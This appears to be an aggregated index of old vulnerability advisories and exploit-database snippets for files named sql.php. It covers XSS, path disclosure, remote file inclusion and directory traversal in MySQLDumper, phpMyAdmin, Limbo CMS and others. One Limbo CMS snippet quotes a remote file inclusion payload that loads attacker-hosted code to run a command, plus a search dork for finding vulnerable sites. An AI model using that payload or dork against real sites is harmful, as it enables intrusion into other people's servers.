CVE-2006-5264

Cross-site scripting XSS vulnerability in sql.php in MysqlDumper 1.21 b6 allows remote attackers to inject arbitrary web script or HTML via the db parameter...

MySQLDumper 1.21 - sql.php Cross-Site Scripting

MySQLDumper 1.21 - sql.php Cross-Site Scripting source: https://www.securityfocus.com/bid/20460/info MySQLDumper is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue could allow an attacker to execute attacker-supplie...

CVE-2006-3034

MyScrapbook 3.1 allows remote attackers to obtain sensitive information via a direct request to files in the txt-db-api directory such as txt-db-api/sql.php, which reveals the path in an error message...

Remote file inclusion

PHP remote file inclusion vulnerability in classes/adodbt/sql.php in Limbo CMS 1.04 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the classesdir parameter...

Limbo CMS <= 1.0.4.2 (sql.php) Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ================================================================== Limbo CMS = 1.0.4.2 sql.php Remote File Inclusion Vulnerability ================================================================== Title: Limbo CMS = 1.04 Remote File...

Limbo CMS 1.0.4.2 - sql.php Remote File Inclusion

Limbo CMS 1.0.4.2 - sql.php Remote File Inclusion Title: Limbo CMS = 1.04 Remote File Inclusion URL: http://www.limbo-cms.com/ Dork: inurl:"index2.php?option=rss" OR "powered By Limbo CMS" Credits: Oo Exploit: /classes/adodbt/sql.php?classesdir=http://yourhost/cmd.gif?cmd=ls milw0rm.com 2006-04-2...

Cross site scripting

Cross-site scripting XSS vulnerability in sql.php in phpMyAdmin 2.7.0-pl1 allows remote attackers to inject arbitrary web script or HTML via the sqlquery parameter...

CVE-2006-1803

CVE-2006-1803 is a cross-site scripting (XSS) vulnerability in phpMyAdmin 2.7.0-pl1, exploitable via the sql_query parameter in sql.php. The issue allows remote attackers to inject arbitrary web script or HTML. This detailed description is consistently echoed across multiple sources (NVD, SUSE, O...

CVE-2006-1803

Cross-site scripting XSS vulnerability in sql.php in phpMyAdmin 2.7.0-pl1 allows remote attackers to inject arbitrary web script or HTML via the sqlquery parameter...

phpMyAdmin < 2.2.1 'sql.php' Arbitrary File Access

Binary data 2418.prm...

CVE-2001-0479

Directory traversal vulnerability in phpPgAdmin 2.2.1 and earlier versions allows remote attackers to execute arbitrary code via a .. dot dot in an argument to the sql.php script...

CVE-2001-0478

CVE-2001-0478 affects phpMyAdmin 2.2.0 and earlier. The vulnerability is a directory traversal in the sql.php parameter that allows a remote attacker to execute arbitrary code by supplying a .. path segment. Several sources corroborate arbitrary code execution or arbitrary file access via sql.php...